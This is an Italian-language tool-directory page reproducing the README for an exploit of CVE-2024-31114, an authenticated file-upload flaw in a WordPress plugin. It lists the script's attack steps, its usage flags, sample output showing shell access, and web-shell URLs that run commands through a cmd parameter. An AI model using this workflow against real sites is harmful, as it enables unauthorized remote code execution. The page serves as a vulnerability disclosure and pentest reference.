Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-31114 — Shortcode Addons <= 3.2.5 - Autenticato (Admin+) Caricamento Arbitrario di File | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2024-31114
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubnxploited/cve-2024-31114

CVE-2024-31114

Shortcode Addons <= 3.2.5 - Autenticato (Admin+) Caricamento Arbitrario di File

Vedi Repository
21 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-31114 - Exploit RCE per Shortcode Addons di WordPress

Shortcode Addons <= 3.2.5 – Upload arbitrario di file autenticato (Admin+)
ID CVE: CVE-2024-31114
Punteggio CVSS: 9.1 (Critico)


🛠️ Descrizione della vulnerabilità

Il plugin Shortcode Addons – with Visual Composer, Divi, Beaver Builder, and Elementor Extension per WordPress è vulnerabile a caricamenti arbitrari di file a causa della mancata validazione del tipo di file in tutte le versioni fino alla 3.2.5 inclusa.

Questa falla consente a attaccanti autenticati con accesso di livello amministratore o superiore di caricare file arbitrari sul server — il che può portare a Esecuzione di Codice Remota (RCE).


🚀 Descrizione dello script

Questo script Python automatizza lo sfruttamento della vulnerabilità. Esegue:

  1. Disabilitazione della verifica SSL
  2. Accesso con le credenziali fornite
  3. Estrazione del token CSRF (_wpnonce)
  4. Generazione di una shell PHP (nxploit.php)
  5. Compressione e caricamento come .zip
  6. Conferma del caricamento e accesso alla shell
  7. Esecuzione di whoami sul server target

🧪 Utilizzo

usage: CVE-2024-31114.py [-h] -u URL -un USERNAME -p PASSWORD

Shortcode Addons <= 3.2.5 - Upload arbitrario di file autenticato (Admin+)
Di: Nxploited | Khaled Alenazi

opzioni:
  -h, --help            Mostra questo messaggio di aiuto ed esci
  -u, --url URL         URL del target (es. http://target.com)
  -un, --username USERNAME   Nome utente amministratore WordPress
  -p, --password PASSWORD    Password amministratore WordPress

📤 Esempio di output

[+] Autenticazione riuscita.
[+] _wpnonce estratto: 9d8dbbc630
[+] Payload nxploit.zip creato.
[+] Payload caricato.
[+] Shell accessibile all'indirizzo: http://target/wp-content/uploads/shortcode-addons/nxploit.php
[+] Output del comando:
------------------
www-data
------------------
[+] File temporanei rimossi.

🐚 Utilizzo della Web Shell

Una volta caricato il payload, puoi eseguire comandi di sistema usando il seguente formato:

http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=comando

🔹 Esempio:

http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=ls

Questo elencherà il contenuto della directory corrente sul server.

⚠️ Disclaimer

Questo strumento è solo per scopi educativi e di test autorizzati.
L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo script.

Usalo responsabilmente e solo su sistemi per i quali hai esplicita autorizzazione al test.


Di: Nxploited | Khaled Alenazi

Scarica lo strumento